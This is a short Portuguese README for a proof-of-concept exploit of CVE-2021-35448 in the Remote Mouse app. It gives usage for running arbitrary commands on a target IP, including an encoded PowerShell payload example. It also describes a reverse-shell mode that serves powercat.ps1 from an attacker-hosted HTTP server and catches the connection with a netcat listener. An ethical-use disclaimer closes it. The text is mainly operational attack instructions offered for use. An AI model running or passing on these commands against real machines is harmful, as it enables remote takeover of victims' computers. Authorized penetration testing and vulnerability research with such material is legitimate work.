
POC para CVE-2021-35448 baseado em https://www.exploit-db.com/exploits/49601
Este exploit visa a vulnerabilidade CVE-2021-35448 no aplicativo Remote Mouse (anteriormente WiFi Mouse).
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: Endereço IP do alvo (obrigatório)-p, --payload: Comando personalizado a executar-r, --reverse: Shell reverso no formato IP:PORTA-l, --http: Servidor HTTP local no formato IP:PORTA (obrigatório com -r)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: Script principal de exploraçãopowercat.ps1: Script PowerShell para shells reversos⚠️ APENAS USO ÉTICO ⚠️
Esta ferramenta destina-se apenas a fins educacionais e testes de penetração autorizados. O uso não autorizado deste exploit é ilegal e pode resultar em processo judicial.
Desenvolvido para fins educacionais e testes de penetração éticos.
Última atualização: 2025